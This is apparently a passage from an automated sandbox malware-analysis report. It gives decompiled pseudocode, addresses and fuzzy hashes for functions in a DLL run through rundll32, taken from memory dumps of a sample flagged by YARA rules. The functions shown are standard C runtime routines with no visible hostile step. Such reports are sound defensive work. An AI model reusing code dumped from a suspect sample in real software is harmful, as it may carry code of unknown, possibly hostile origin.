								return E6E220075(_t87);
							} else {
								__eflags = _t84;
								if(_t84 == 0) {
									_push( *((intOrPtr*)(_t88 + 8)));
									_push(_t88 - 0x10);
									__eflags = E6E204F5F(_t62, _t72, __edx, _t84, _t87) - 0xffffffff;
									if(__eflags == 0) {
										_t76 = _t88 - 0x20;
										E6E1E1438(_t76);
										E6E223D74(_t88 - 0x20, 0x6e2c3504);
										asm("int3");
										 *_t76 = __edx;
										return _t76;
									} else {
										_t87 =  *((intOrPtr*)(_t88 - 0x10));
										 *((intOrPtr*)(_t88 - 0x10)) = _t87;
										 *(_t88 - 4) = 1;
										E6E206FD3(__eflags, _t87);
										 *((intOrPtr*)( *_t87 + 4))();
										 *0x6e2dce7c = _t87;
										goto L12;
									}
								} else {
									_t87 = _t84;
									goto L12;
								}
							}
						} else {
							_t86 =  *((intOrPtr*)(_t88 - 0x10));
							 *((intOrPtr*)(_t88 - 0x10)) = _t86;
							 *(_t88 - 4) = 1;
							E6E206FD3(__eflags, _t86);
							 *((intOrPtr*)( *_t86 + 4))();
							 *0x6e2dce84 = _t86;
							goto L5;
						}
					} else {
						_t86 = _t83;
						goto L5;
					}
				}
			}











                          0x6e2046ab
                          0x6e2046b2
                          0x6e2046bc
                          0x6e2046c1
                          0x6e2046ca
                          0x6e2046d0
                          0x6e2046d3
                          0x6e2046d8
                          0x6e2046dc
                          0x6e2046e1
                          0x6e2046e5
                          0x6e204720
                          0x6e204723
                          0x6e20472f
                          0x6e2046e7
                          0x6e2046e9
                          0x6e2046ef
                          0x6e2046f5
                          0x6e2046fd
                          0x6e204700
                          0x6e204733
                          0x6e204741
                          0x6e204746
                          0x6e20474e
                          0x6e204758
                          0x6e20475d
                          0x6e204766
                          0x6e20476c
                          0x6e20476f
                          0x6e204774
                          0x6e20477d
                          0x6e20477f
                          0x6e204781
                          0x6e2047bc
                          0x6e2047bf
                          0x6e2047cb
                          0x6e204783
                          0x6e204783
                          0x6e204785
                          0x6e20478b
                          0x6e204791
                          0x6e204799
                          0x6e20479c
                          0x6e2047cc
                          0x6e2047cf
                          0x6e2047dd
                          0x6e2047e2
                          0x6e2047e3
                          0x6e2047e7
                          0x6e20479e
                          0x6e20479e
                          0x6e2047a1
                          0x6e2047a5
                          0x6e2047a9
                          0x6e2047b3
                          0x6e2047b6
                          0x00000000
                          0x6e2047b6
                          0x6e204787
                          0x6e204787
                          0x00000000
                          0x6e204787
                          0x6e204785
                          0x6e204702
                          0x6e204702
                          0x6e204705
                          0x6e204709
                          0x6e20470d
                          0x6e204717
                          0x6e20471a
                          0x00000000
                          0x6e20471a
                          0x6e2046eb
                          0x6e2046eb
                          0x00000000
                          0x6e2046eb
                          0x6e2046e9

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E2046B2
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2046BC
                          • int.LIBCPMT ref: 6E2046D3
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20470D
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E204723
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E204741
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 5f90f26e08f2838698c0b7c978f986d40517162ec772511e8c5e21d796359592
                          • Instruction ID: 325578467af4ab80f22256d81193297801e9c7faf2b1cfb461339df5bedec8d4
                          • Opcode Fuzzy Hash: 5f90f26e08f2838698c0b7c978f986d40517162ec772511e8c5e21d796359592
                          • Instruction Fuzzy Hash: C211047AE0052E9FCB01DBE0C854AEDB77BBF55715F104A08E510AB2D0EBB49A45C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24D5FF, Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E6E24D5FF(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6e2c51e4; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6E24C7EF(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6E254196(_t25, __eflags,  *0x6e2c51e4, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6E24D33F(_t25, _t31, 0x6e2c76f0);
							E6E24CBD3(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6E24CBD3();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6E2462FA(_t20, _t25, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6e2c51e4; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6E24C7EF(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6E254196(_t27, __eflags,  *0x6e2c51e4, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6E24D33F(_t27, _t32, 0x6e2c76f0);
									E6E24CBD3(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6E24CBD3();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6E254140(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6E254140(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                          0x6e24d5ff
                          0x6e24d5ff
                          0x6e24d5ff
                          0x6e24d609
                          0x6e24d60b
                          0x6e24d610
                          0x6e24d613
                          0x6e24d621
                          0x6e24d628
                          0x6e24d62d
                          0x6e24d630
                          0x6e24d633
                          0x6e24d645
                          0x6e24d64a
                          0x6e24d64c
                          0x6e24d657
                          0x6e24d65e
                          0x6e24d663
                          0x6e24d666
                          0x6e24d668
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24d64e
                          0x6e24d64e
                          0x00000000
                          0x6e24d64e
                          0x6e24d635
                          0x6e24d635
                          0x6e24d636
                          0x6e24d636
                          0x6e24d63b
                          0x6e24d676
                          0x6e24d677
                          0x6e24d67d
                          0x6e24d682
                          0x6e24d685
                          0x6e24d686
                          0x6e24d687
                          0x6e24d68e
                          0x6e24d690
                          0x6e24d692
                          0x6e24d697
                          0x6e24d69a
                          0x6e24d6a8
                          0x6e24d6b4
                          0x6e24d6b7
                          0x6e24d6ba
                          0x6e24d6cc
                          0x6e24d6d1
                          0x6e24d6d3
                          0x6e24d6de
                          0x6e24d6e4
                          0x6e24d6ec
                          0x6e24d6ee
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24d6d5
                          0x6e24d6d5
                          0x00000000
                          0x6e24d6d5
                          0x6e24d6bc
                          0x6e24d6bc
                          0x6e24d6bd
                          0x6e24d6bd
                          0x6e24d6f0
                          0x6e24d6f1
                          0x6e24d6f1
                          0x6e24d69c
                          0x6e24d6a2
                          0x6e24d6a6
                          0x6e24d6f9
                          0x6e24d6fa
                          0x6e24d700
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24d6a6
                          0x6e24d707
                          0x6e24d707
                          0x6e24d615
                          0x6e24d61b
                          0x6e24d61f
                          0x6e24d66a
                          0x6e24d66b
                          0x6e24d675
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24d61f

                          APIs
                          • GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,96574AD2), ref: 6E24D603
                          • _free.LIBCMT ref: 6E24D636
                          • _free.LIBCMT ref: 6E24D65E
                          • SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,96574AD2), ref: 6E24D66B
                          • SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,96574AD2), ref: 6E24D677
                          • _abort.LIBCMT ref: 6E24D67D
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          • Opcode ID: 32e052e5f1fea9f104c0d2fee17bc169a37ac2248292001db495ceb1f0edf641
                          • Instruction ID: 9a7cd09454368dbab1051a50c8191e7456ad7ac45acccf8267cc2d1e10e6fa86
                          • Opcode Fuzzy Hash: 32e052e5f1fea9f104c0d2fee17bc169a37ac2248292001db495ceb1f0edf641
                          • Instruction Fuzzy Hash: BBF0493904490DE7C78926F9EC0DF8A233F8BC2A66B244911F428D7184EFB488028874
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2075E8, Relevance: 9.0, APIs: 6, Instructions: 33COMMON
                          Download Yara Rule
                          C-Code - Quality: 51%
                          			E6E2075E8(intOrPtr _a4) {
				char _v16;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v68;
				char _v76;
				void* _t33;
				void* _t35;
				void* _t36;

				_t36 = _t35 - 0xc;
				E6E2073A9( &_v16, _a4);
				E6E223D74( &_v16, 0x6e2c14fc);
				asm("int3");
				_push(_t35);
				E6E2073E3( &_v44, _v24);
				E6E223D74( &_v44, 0x6e2c1538);
				asm("int3");
				_push(_t36);
				_t33 = _t36 - 0xc;
				E6E207426( &_v76, _v52);
				E6E223D74( &_v76, 0x6e2c15ac);
				asm("int3");
				_push(_t33);
				E6E1E1420( &_v68, _v48);
				E6E223D74( &_v68, 0x6e2c3450);
				asm("int3");
				return  &M6E26A3FC;
			}













                          0x6e2075eb
                          0x6e2075f4
                          0x6e207602
                          0x6e207607
                          0x6e207608
                          0x6e207614
                          0x6e207622
                          0x6e207627
                          0x6e207628
                          0x6e207629
                          0x6e207634
                          0x6e207642
                          0x6e207647
                          0x6e207648
                          0x6e207654
                          0x6e207662
                          0x6e207667
                          0x6e20766d

                          APIs
                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E2075F4
                            • Part of subcall function 6E2073A9: std::exception::exception.LIBCONCRT ref: 6E2073B6
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E207602
                            • Part of subcall function 6E223D74: RaiseException.KERNEL32(00000000,?,u n,00000000,?,?,?,?,?,?,?,6E2075E7,00000000,6E2C14C0,?), ref: 6E223DD4
                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E207614
                            • Part of subcall function 6E2073E3: std::exception::exception.LIBCONCRT ref: 6E2073F0
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E207622
                          • std::regex_error::regex_error.LIBCPMT ref: 6E207634
                            • Part of subcall function 6E207426: std::exception::exception.LIBCONCRT ref: 6E20743E
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E207642
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throwstd::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
                          • String ID:
                          • API String ID: 2570946744-0
                          • Opcode ID: c793653b1028f631dfa089b8c65836f085f1ac10292c706ace307582354239e5
                          • Instruction ID: bc20243a92160734bc8aa5ec56accde5d901f2cb113101ed41dab999bf1482eb
                          • Opcode Fuzzy Hash: c793653b1028f631dfa089b8c65836f085f1ac10292c706ace307582354239e5
                          • Instruction Fuzzy Hash: 44F0FE39C0010D7BCB05FBE4DC49CDDB77EAA14544F804A20AA1496591EB71A659C6D2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2053EB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E6E2053EB(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t35;
				short _t49;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t66;
				void* _t70;
				void* _t78;

				_t61 = __edx;
				E6E22014E(0x6e268264, __ebx, __edi, __esi, 0xa4);
				_t55 = __ecx;
				 *((intOrPtr*)(_t70 - 0x4c)) = __ecx;
				 *((intOrPtr*)(_t70 - 0x44)) = E6E241A3F(__ecx, __edx);
				_t35 = E6E2091D8(__ecx, __edx, _t78, _t70 - 0x80);
				_t58 = 0xb;
				memcpy(_t70 - 0x40, _t35, _t58 << 2);
				_t66 =  *((intOrPtr*)(_t70 - 0x44));
				_t79 =  *((char*)(_t70 + 0xc));
				 *((intOrPtr*)(_t55 + 8)) = 0;
				 *((intOrPtr*)(_t55 + 0x10)) = 0;
				 *((intOrPtr*)(_t55 + 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t13 = _t66 + 8; // 0x0
					 *((intOrPtr*)(_t70 - 0x48)) =  *_t13;
				} else {
					 *((intOrPtr*)(_t70 - 0x48)) = 0x6e2794dd;
				}
				E6E2091D8(_t55, _t61, _t79, _t70 - 0x80);
				_push(_t70 - 0xac);
				_push(0);
				 *((intOrPtr*)(_t55 + 8)) = E6E205B01(_t61, _t66, 0, _t70, _t79,  *((intOrPtr*)(_t70 - 0x48)));
				_push(_t70 - 0x40);
				 *((intOrPtr*)(_t55 + 0x10)) = E6E1E17AF(_t55, _t61, _t66, 0, _t70, _t79, "false", 0);
				_push(_t70 - 0x40);
				 *((intOrPtr*)(_t55 + 0x14)) = E6E1E17AF(_t55, _t61, _t66, 0, _t70, _t79, "true", 0);
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t28 = _t66 + 0x30; // 0x0
					 *((short*)(_t55 + 0xc)) =  *((intOrPtr*)( *_t28));
					_t30 = _t66 + 0x34; // 0xc
					_t49 =  *((intOrPtr*)( *_t30));
				} else {
					 *((short*)(_t55 + 0xc)) = E6E1E177E(0x2e, 0, _t70 - 0x40);
					_t49 = E6E1E177E(0x2c, 0, _t70 - 0x40);
				}
				 *((short*)(_t55 + 0xe)) = _t49;
				return E6E22009B(_t49, _t55, _t66, 0);
			}










                          0x6e2053eb
                          0x6e2053f5
                          0x6e2053fa
                          0x6e2053fc
                          0x6e205404
                          0x6e20540b
                          0x6e205413
                          0x6e205419
                          0x6e20541b
                          0x6e205420
                          0x6e205424
                          0x6e205427
                          0x6e20542a
                          0x6e20542d
                          0x6e205430
                          0x6e20543b
                          0x6e20543e
                          0x6e205432
                          0x6e205432
                          0x6e205432
                          0x6e205445
                          0x6e205451
                          0x6e205452
                          0x6e20545e
                          0x6e205464
                          0x6e205473
                          0x6e205479
                          0x6e205488
                          0x6e20548f
                          0x6e2054bf
                          0x6e2054c5
                          0x6e2054c9
                          0x6e2054cc
                          0x6e205491
                          0x6e2054a0
                          0x6e2054ab
                          0x6e2054b0
                          0x6e2054b3
                          0x6e2054bc

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Getcvt$H_prolog3_catch_
                          • String ID: false$true
                          • API String ID: 1810345438-2658103896
                          • Opcode ID: cf873538ae9abfa7ba0f6e3f5c63ee4bf5c291a9d9cfcf3ab39a3c852cbb81e6
                          • Instruction ID: 7531bd0d55aa755e4efd8bfd98f7d9ad7d5b170f848d142ec67f51e9ce84f4e5
                          • Opcode Fuzzy Hash: cf873538ae9abfa7ba0f6e3f5c63ee4bf5c291a9d9cfcf3ab39a3c852cbb81e6
                          • Instruction Fuzzy Hash: E7216DB6D0121CAFDB11CFE5C884ADEBBB9BF05710F04446AE9049F640EB709A95CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24970F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E2496A5,?,?,6E249645,?,6E2C2D28,0000000C,6E24978A), ref: 6E24972F
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E249742
                          • FreeLibrary.KERNEL32(00000000,?,?,?,6E2496A5,?,?,6E249645,?,6E2C2D28,0000000C,6E24978A), ref: 6E249765
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 9104e660e4ef8e7cbd5607b7509a8559fa501d28631d6604808a370368a4d39c
                          • Instruction ID: 11d5c449a251d1c9f717f503511100945b597d2cf1bf1fc52f41c0e5bb53406a
                          • Opcode Fuzzy Hash: 9104e660e4ef8e7cbd5607b7509a8559fa501d28631d6604808a370368a4d39c
                          • Instruction Fuzzy Hash: B1F0AF7090052EFBDF419F90C958FAEBFBAEF05712F0081A8A905A6240DB319A40CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E254E2A, Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E6E254E2A(void* __ebx, int __edx, void* __edi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				int _v44;
				char _v48;
				void* __esi;
				signed int _t59;
				char* _t61;
				int _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				int _t106;
				int _t107;
				short* _t109;
				int _t110;
				int _t111;
				signed int _t112;

				_t106 = __edx;
				_t59 =  *0x6e2c506c; // 0x8e829fa6
				_v8 = _t59 ^ _t112;
				_t61 = _a4;
				_t91 = _a12;
				_t111 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t109 = _a8;
				_v24 = _t109;
				if(_t61 == 0 || _t91 != 0) {
					if(_t109 != 0) {
						E6E231F60(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t109, 0xffffffff, _t111, _t111, _t111,  &_v20);
								if(_t64 == 0 || _v20 != _t111) {
									L55:
									_t65 = E6E242281();
									_t110 = _t109 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t110 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t109 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t110 = _t111;
								goto L56;
							}
							_t106 = 0xff;
							while(_t68 <= _t106) {
								_t109 =  &(_t109[1]);
								_t111 = _t111 + 1;
								_t68 =  *_t109 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t106 = _v44;
						if( *((intOrPtr*)(_t106 + 0xa8)) != _t111) {
							if( *((intOrPtr*)(_t106 + 4)) != 1) {
								_t110 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, 0xffffffff, _t98, _t91, _t111,  &_v20);
								if(_t110 == 0) {
									if(_v20 != _t111 || GetLastError() != 0x7a) {
										L45:
										_t71 = E6E242281();
										_t111 = _t111 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t107 = _v44;
											_t103 =  *(_t107 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t107 + 8), _t111, _t73, 1,  &_v16, _t103, _t111,  &_v20);
											_t93 = _a12;
											_t106 = _t74;
											if(_t106 == 0 || _v20 != _t111 || _t106 < 0 || _t106 > 5) {
												goto L55;
											}
											if(_t106 + _t110 > _t93) {
												goto L56;
											}
											_t76 = _t111;
											_v32 = _t76;
											if(_t106 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t110 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
												 *((char*)(_t105 + _t110)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t110 = _t110 + 1;
												_v32 = _t76;
												if(_t76 < _t106) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t111) {
									goto L45;
								}
								_t28 = _t110 - 1; // -1
								_t111 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t111 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, _t91, _t98, _t91, _t111,  &_v20);
								if(_t111 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t111 - 1] == 0) {
										_t111 = _t111 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t109;
							_v24 = _t91;
							while( *_t83 != _t111) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t111 &&  *_t83 == _t111) {
								_t91 = (_t83 - _t109 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						_t106 = 0xff;
						while( *_t109 <= _t106) {
							_t98[_t111] =  *_t109;
							_t85 =  *_t109;
							_t109 =  &(_t109[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t111 = _t111 + 1;
							if(_t111 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E6E242281())) = 0x16;
					E6E24215B();
					goto L59;
				} else {
					L59:
					return E6E21F8A5(_v8 ^ _t112, _t106, _t111);
				}
			}





































                          0x6e254e2a
                          0x6e254e32
                          0x6e254e39
                          0x6e254e3c
                          0x6e254e40
                          0x6e254e44
                          0x6e254e46
                          0x6e254e49
                          0x6e254e4d
                          0x6e254e50
                          0x6e254e55
                          0x6e254e64
                          0x6e254e84
                          0x6e254e89
                          0x6e254e8e
                          0x6e25502b
                          0x6e255034
                          0x6e255066
                          0x6e25506e
                          0x6e25507a
                          0x6e25507a
                          0x6e25507f
                          0x6e255082
                          0x00000000
                          0x6e255075
                          0x6e255075
                          0x6e255075
                          0x6e255088
                          0x6e25508c
                          0x6e255091
                          0x6e255091
                          0x00000000
                          0x6e255098
                          0x6e25506e
                          0x6e255036
                          0x6e25503c
                          0x6e255054
                          0x6e255054
                          0x00000000
                          0x6e255054
                          0x6e25503e
                          0x6e255043
                          0x6e255048
                          0x6e25504b
                          0x6e25504c
                          0x6e255052
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e255052
                          0x00000000
                          0x6e255043
                          0x6e254e94
                          0x6e254e9d
                          0x6e254ed7
                          0x6e254f50
                          0x6e254f54
                          0x6e254f6a
                          0x6e25501b
                          0x6e25501b
                          0x6e255020
                          0x6e255023
                          0x00000000
                          0x6e254f7f
                          0x6e254f81
                          0x00000000
                          0x00000000
                          0x6e254f87
                          0x6e254f8a
                          0x6e254f8a
                          0x6e254f8d
                          0x6e254f93
                          0x6e254f97
                          0x6e254f97
                          0x6e254fa9
                          0x6e254faf
                          0x6e254fb2
                          0x6e254fb6
                          0x00000000
                          0x00000000
                          0x6e254fdb
                          0x00000000
                          0x00000000
                          0x6e254fe1
                          0x6e254fe3
                          0x6e254fe8
                          0x6e255008
                          0x6e25500b
                          0x6e25500e
                          0x6e255013
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e255019
                          0x6e254fea
                          0x6e254fed
                          0x6e254fed
                          0x6e254ff1
                          0x6e254ff6
                          0x00000000
                          0x00000000
                          0x6e254fff
                          0x6e255000
                          0x6e255001
                          0x6e255006
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e255006
                          0x00000000
                          0x6e254fed
                          0x00000000
                          0x6e254f8a
                          0x6e254f6a
                          0x6e254f59
                          0x00000000
                          0x00000000
                          0x6e254f5f
                          0x6e254f5f
                          0x00000000
                          0x6e254f5f
                          0x6e254edb
                          0x6e254f01
                          0x6e254f14
                          0x6e254f18
                          0x00000000
                          0x6e254f28
                          0x6e254f30
                          0x6e254f36
                          0x6e254f36
                          0x00000000
                          0x6e254f30
                          0x6e254f18
                          0x6e254edd
                          0x6e254edf
                          0x6e254ee2
                          0x6e254ee7
                          0x6e254eea
                          0x6e254eea
                          0x6e254eee
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e254eee
                          0x6e254ef3
                          0x6e254f00
                          0x6e254f00
                          0x00000000
                          0x6e254ef3
                          0x6e254ea1
                          0x00000000
                          0x00000000
                          0x6e254ea7
                          0x6e254eac
                          0x6e254eb7
                          0x6e254eba
